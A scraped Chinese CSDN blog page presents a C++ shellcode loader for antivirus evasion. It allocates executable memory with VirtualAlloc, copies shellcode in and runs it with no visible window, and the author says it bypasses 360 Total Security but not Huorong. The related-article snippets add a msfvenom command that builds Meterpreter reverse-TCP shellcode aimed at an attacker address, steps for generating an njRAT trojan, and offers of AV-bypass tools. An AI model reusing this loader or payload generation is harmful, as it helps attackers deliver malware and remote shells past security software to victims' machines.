360安全卫士 免杀

最新推荐文章于 2025-02-21 15:16:37 发布
最新推荐文章于 2025-02-21 15:16:37 发布
阅读量826 收藏 1
点赞数
分类专栏: 免杀 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43647462/article/details/109705209
版权
博客介绍了如何编写一段C++代码来创建一个免杀壳,该壳能够绕过360安全卫士的检测。通过设置多线程运行库,利用VirtualAlloc函数分配内存并注入shellcode执行,实现在Windows环境下隐藏程序行为。然而,尽管能绕过360安全卫士,但火绒安全软件仍能检测并查杀该程序。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

绕过360安全卫士(无法绕过火绒)

Buchiyexiao

#include <windows.h>
#include <stdio.h>
#pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"")//不显示窗口

unsigned char shellcode[] = "veil_shellcode";

void main()
{
  LPVOID Memory = VirtualAlloc(NULL, sizeof(shellcode),MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
  if (Memory == NULL) { return; }
  memcpy(Memory, shellcode, sizeof(shellcode));
  ((void(*)())Memory)();
}

使用VS2019提前将运行库设置成:多线程(/MT),不然VirtualAlloc函数无法正常使用,将编译生成的exe和直接生成的Windows exe木马同时扔到虚拟机中发现,Windows exe被查杀,而免杀处理后的exe绕过360安全卫士(火绒则都会直接查杀删除)

在这里插入图片描述
在这里插入图片描述

shellcode之360安全卫士(shecodject)(一)
ZPFCD的博客
07-16 955
shellcode
一键360四引擎
11-19
360360360360360360360360360360360360360360360360360360360360360
最新360全套,无提示上线,世界毒网!!
12-18
最新360全套
【kali笔记】MSF内网渗透,手把手教你如何360!网络安全零基础入门到精通教程!
最新发布
qq_41314882的博客
02-21 504
,全称为反毒技术(Anti Anti-Virus),是一种能使病毒或木马于被毒软件查的技术。定义: 技术通过修改病毒、木马的内容或者特征码,使其能够躲避毒软件的查。原理: 毒软件通常通过识别病毒或木马的特征码来检测和清楚恶意软件。技术通过修改这些特征码,使病毒或木马在毒软件的检测下“隐身”。我给大家准备了一份全套的《网络安全入门+进阶学习资源包》包含各种常用工具和黑客技术电子书以及视频教程,需要的小伙伴可以扫描下方二维码或链接费领取~ 技术可以根据不同的标准进行分类,下面是
绕过软(二)——exe文件(360、火绒
热门推荐
W小哥
06-12 1万+
攻击机: win7 IP: 192.168.32.134 靶机: windows server 2012(安装360、火绒) IP: 192.168.32.133第一步:使用njRAT生产一个客户端exe木马 输入回连端口号8888,点击start 配置客户端木马的回连地址:192.168.32.134 将文件保存在桌面 开启360毒,直接报毒,不 1、将生成的客户端木马:Server.exe在 Encryption Tool V3.0中以base64加密方式打开 打开之后,将base6
360全家桶
sash1mi
01-28 4115
360全家桶 1.kali生成一串shellcode msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 6 LHOST=kali的ip地址 LPORT=随便写个端口号(8888、9999都阔以) -f c 2.VS编写程序 这里给出代码 #include <windows.h> #include <stdio.h> (这里是我生成的shellcode) unsigned char
最新360
12-17
最新360云查
360安全卫士器.rar
01-06
标题中的“360安全卫士器.rar”指的是一个名为“360安全卫士器”的软件的压缩文件,其扩展名为RAR,通常用于存储和传输多个文件。这种工具的主要功能可能是帮助用户绕过360安全卫士的检测,使得某些可能被...
360安全卫士器工具的介绍和使用
以下是基于文件标题“360安全卫士器.rar”所能提炼的知识点,从技术角度和教育意义出发,不涉及推广或指导任何非法或不道德的行为。 首先,标题中的“360安全卫士”是指一款在中国广泛使用的网络安全软件,它...
易语言程序修改器(只过360检测)
02-14
【标题】"易语言程序修改器(只过360检测)" 指的是一种专门用于修改易语言编写的程序,以规避360安全卫士毒软件检测的工具。在IT领域,""是黑客或恶意软件开发者用来描述绕过反病毒软件检测的技术。这种...
VS2010 域名360个人版远控
01-15
【描述】"VS2010 域名360个人版远控"的描述简洁,可能是指使用VS2010开发的某程序或者工具,具有360安全卫士个人版检测的能力,同时能实现对目标计算机的远程控制,可能通过特定的域名进行通信。在网络安全...
利用360软件设置的360终极.绝对过360
11-19
哼哼,研究了半年终于弄出了个利用360内部程序做的360.百分之百过360.... 希望大家采纳!!!!!
360壳,
06-11
360壳过360云查。主动一切防御提示
绕过360简单技巧(
06-04
浴血凤凰的教程,用restorator修改版本和图标绕过360毒,适合菜鸟看。不错哦
易语言一键过,过360. (加壳)
10-21
Esprotect3.9.exe 易语言一键过,过360. (加壳)
最新过360
12-17
最新过360
360笔记
司徒荆的博客
06-22 75
1、360---BD引擎 (1)360-Bd把特征码定位在版权部分 (2)360-Bd把字符串定位在字符串内面 (3)360-Bd吧特特征码定位在资源位置(版权,图标,图片之类的) 2、360-QVM引擎 (1)定位比较麻烦 (2)定位到OLEAUT32.dll,修改时候,延时加载 #pragma comment (linker,"/DELAYLOAD:OLEAUT32.dll");...
反射注入dll-修改实现360
bring_coco的博客
07-05 1313
getAdvapi32()函数也是LoadLibrary(“advapi32.dll”)的变形,和getKernel32作用一样,只不过是函数所在的dll不同,写成汇编形式避检测,但是使用getAdvapi32()生成会无法注入(具体原因不清除,之后再研究吧),那么我这里注释掉,仅仅用了getKernel32函数。获得的pCFA就是原始的CreateFileA函数了,只不过被我们定义成了自己的,这样就会规避检测了,那么剩下的三处也是同样方法修改,具体参考上面给的代码。
Cobalt Strike shellcode360
qq_18193739的博客
08-02 1705
地址:https://github.com/wei930630/go-shellcode-launcher。复制选中的shellcode代码,放入上面C++ xor加密shellcode代码,并运行。将生成的xor编码的shellcode 放入shellcode加载器。使用Cobalt Strike 生成shellcode 代码。使用Cobalt Strike 生成shellcode 代码。将选中的shellcode 代码,复制到新1.txt文件中。将上面的shellcode加载器编译为exe文件。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值